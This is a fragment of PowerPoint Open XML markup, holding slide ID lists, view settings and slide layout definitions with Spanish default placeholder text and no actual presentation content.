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27"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId28"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="275" r:id="rId4"/>
    <p:sldId id="279" r:id="rId5"/>
    <p:sldId id="277" r:id="rId6"/>
    <p:sldId id="258" r:id="rId7"/>
    <p:sldId id="259" r:id="rId8"/>
    <p:sldId id="276" r:id="rId9"/>
    <p:sldId id="260" r:id="rId10"/>
    <p:sldId id="261" r:id="rId11"/>
    <p:sldId id="262" r:id="rId12"/>
    <p:sldId id="263" r:id="rId13"/>
    <p:sldId id="265" r:id="rId14"/>
    <p:sldId id="266" r:id="rId15"/>
    <p:sldId id="267" r:id="rId16"/>
    <p:sldId id="268" r:id="rId17"/>
    <p:sldId id="269" r:id="rId18"/>
    <p:sldId id="281" r:id="rId19"/>
    <p:sldId id="270" r:id="rId20"/>
    <p:sldId id="271" r:id="rId21"/>
    <p:sldId id="272" r:id="rId22"/>
    <p:sldId id="282" r:id="rId23"/>
    <p:sldId id="278" r:id="rId24"/>
    <p:sldId id="273" r:id="rId25"/>
    <p:sldId id="274" r:id="rId26"/>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21" autoAdjust="0"/>
    <p:restoredTop sz="94599" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="125" d="100"/>
          <a:sy n="125" d="100"/>
        </p:scale>
        <p:origin x="90" y="108"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide pos="3839"/>
        <p:guide orient="horz" pos="2160"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:notesViewPr>
    <p:cSldViewPr showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="52" d="100"/>
          <a:sy n="52" d="100"/>
        </p:scale>
        <p:origin x="2664" y="3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4AA43A-3F76-4A13-9CD6-36134EB429E3}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:t>7/9/2022</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50423A-8BCE-448E-A97B-03A88B2B12C1}" type="slidenum">
              <a:rPr/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr/>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674A4F-2B7A-4ECB-A400-260B2FFC03C1}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:t>7/9/2022</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F2A70B-78F2-4DCF-B53B-C990D2FAFB8A}" type="slidenum">
              <a:rPr/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr/>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01F2A70B-78F2-4DCF-B53B-C990D2FAFB8A}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1732545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654" y="1447801"/>
            <a:ext cx="8823360" cy="3329581"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="7198"/>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154654" y="4777380"/>
            <a:ext cx="8823360" cy="861420"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr cap="all">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457063" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914126" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371189" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828251" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285314" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2742377" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3199440" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3656503"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p>
            <a:fld id="{8E36636D-D922-432D-A958-524484B5923D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>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‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1314412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656" y="4800587"/>
            <a:ext cx="8823359" cy="566738"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2399"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154654" y="685800"/>
            <a:ext cx="8823360"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54655" y="5367325"/>
            <a:ext cx="8823358" cy="493712"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="12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9AFE8FB1-0A7A-443E-AAF7-31D4FA1AA312}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/9/2022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5BA54BD-C84D-46CE-8B72-31BFB26ABA43}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1463796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654" y="1447800"/>
            <a:ext cx="8823361" cy="1981200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4799"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>Haga clic para modificar el estilo de título del patrón</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1154654" y="3657600"/>
            <a:ext cx="8823361" cy="2362200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1799"/>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9AFE8FB1-0A7A-443E-AAF7-31D4FA1AA312}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>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5BA54BD-C84D-46CE-8B72-31BFB26ABA43}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28855405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391" y="1447800"/>
            <a:ext cx="7997232" cy="2323374"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4799"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>Haga clic para modificar el estilo de título del patrón</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1929898" y="3771174"/>
            <a:ext cx="7277753"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marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>Editar el estilo de texto del patrón</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1154654" y="4350657"/>
            <a:ext cx="8823361" cy="1676400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1799"/>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9AFE8FB1-0A7A-443E-AAF7-31D4FA1AA312}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>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5BA54BD-C84D-46CE-8B72-31BFB26ABA43}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="898061" y="971253"/>
            <a:ext cx="801703"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196" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9328060" y="2613787"/>
            <a:ext cx="801703"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196" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4094944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653" y="3124201"/>
            <a:ext cx="8823362" cy="1653180"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3999"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654" y="4777381"/>
            <a:ext cx="8823361" cy="860400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1999" cap="none">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60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9AFE8FB1-0A7A-443E-AAF7-31D4FA1AA312}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>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5BA54BD-C84D-46CE-8B72-31BFB26ABA43}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21084819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199"/>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32782" y="1981200"/>
            <a:ext cx="2946099"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s-ES" smtClean="0"/>
              <a:t>Editar el estilo de texto del patrón</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652293" y="2667000"/>
            <a:ext cx="2926588" cy="3589338"/>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s-ES" smtClean="0"/>
              <a:t>Editar el estilo de texto del patrón</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3882648" y="1981200"/>
            <a:ext cx="2935476"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s-ES" smtClean="0"/>
              <a:t>Editar el estilo de texto del patrón</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3872097" y="2667000"/>
            <a:ext cx="2946027" cy="3589338"/>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s-ES" smtClean="0"/>
              <a:t>Editar el estilo de texto del patrón</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7122845" y="1981200"/>
            <a:ext cx="2931349"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s-ES" smtClean="0"/>
              <a:t>Editar el estilo de texto del patrón</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7122845" y="2667000"/>
            <a:ext cx="2931349" cy="3589338"/>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s-ES" smtClean="0"/>
              <a:t>Editar el estilo de texto del patrón</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="372517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0414"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AFE8FB1-0A7A-443E-AAF7-31D4FA1AA312}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/9/2022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5BA54BD-C84D-46CE-8B72-31BFB26ABA43}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42520571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199"/>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52293" y="4250949"/>
            <a:ext cx="2939284"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s-ES" smtClean="0"/>
              <a:t>Editar el estilo de texto del patrón</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652293" y="2209800"/>
            <a:ext cx="2939284"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s-ES" smtClean="0"/>
              <a:t>Haga clic en el icono para agregar una imagen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652293" y="4827212"/>
            <a:ext cx="2939284" cy="659189"/>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s-ES" smtClean="0"/>
              <a:t>Editar el estilo de texto del patrón</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3888363" y="4250949"/>
            <a:ext cx="2929762"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s-ES" smtClean="0"/>
              <a:t>Editar el estilo de texto del patrón</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3888362" y="2209800"/>
            <a:ext cx="292976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s-ES" smtClean="0"/>
              <a:t>Haga clic en el icono para agregar una imagen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3887009" y="4827211"/>
            <a:ext cx="2933642" cy="659189"/>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s-ES" smtClean="0"/>
              <a:t>Editar el estilo de texto del patrón</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7122845" y="4250949"/>
            <a:ext cx="2931349"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s-ES" smtClean="0"/>
              <a:t>Editar el estilo de texto del patrón</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7122844" y="2209800"/>
            <a:ext cx="2931349"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s-ES" smtClean="0"/>
              <a:t>Haga clic en el icono para agregar una imagen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="20"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7122720" y="4827209"/>
            <a:ext cx="2935232" cy="659189"/>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s-ES" smtClean="0"/>
              <a:t>Editar el estilo de texto del patrón</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Connector 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="372517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0414"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AFE8FB1-0A7A-443E-AAF7-31D4FA1AA312}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/9/2022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5BA54BD-C84D-46CE-8B72-31BFB26ABA43}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22209923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AFE8FB1-0A7A-443E-AAF7-31D4FA1AA312}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/9/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-U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25BA54BD-C84D-46CE-8B72-31BFB26ABA43}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4036957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2050" y="430214"/>
            <a:ext cx="1752145" cy="5826125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" anchor="b" anchorCtr="0"/>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52294" y="887414"/>
            <a:ext cx="7421216" cy="5368924"/>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AFE8FB1-0A7A-443E-AAF7-31D4FA1AA312}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/9/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-U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25BA54BD-C84D-46CE-8B72-31BFB26ABA43}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="108954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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9AFE8FB1-0A7A-443E-AAF7-31D4FA1AA312}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/9/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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25BA54BD-C84D-46CE-8B72-31BFB26ABA43}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424651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656" y="2861734"/>
            <a:ext cx="8823359" cy="1915647"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3999"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654" y="4777381"/>
            <a:ext cx="8823360" cy="860400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1999" cap="all">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60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9AFE8FB1-0A7A-443E-AAF7-31D4FA1AA312}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/9/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-U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25BA54BD-C84D-46CE-8B72-31BFB26ABA43}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1479307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103025" y="2060576"/>
            <a:ext cx="4395194" cy="4195763"/>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653021" y="2056093"/>
            <a:ext cx="4395196" cy="4200245"/>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9AFE8FB1-0A7A-443E-AAF7-31D4FA1AA312}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/9/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-U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25BA54BD-C84D-46CE-8B72-31BFB26ABA43}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3693066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03026" y="1905000"/>
            <a:ext cx="4395193"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1103025" y="2514600"/>
            <a:ext cx="4395194" cy="3741738"/>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653023" y="1905000"/>
            <a:ext cx="4395194"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5653023" y="2514600"/>
            <a:ext cx="4395194" cy="3741738"/>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9AFE8FB1-0A7A-443E-AAF7-31D4FA1AA312}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/9/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-U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25BA54BD-C84D-46CE-8B72-31BFB26ABA43}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2971072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7" name="Date Placeholder 2"/>
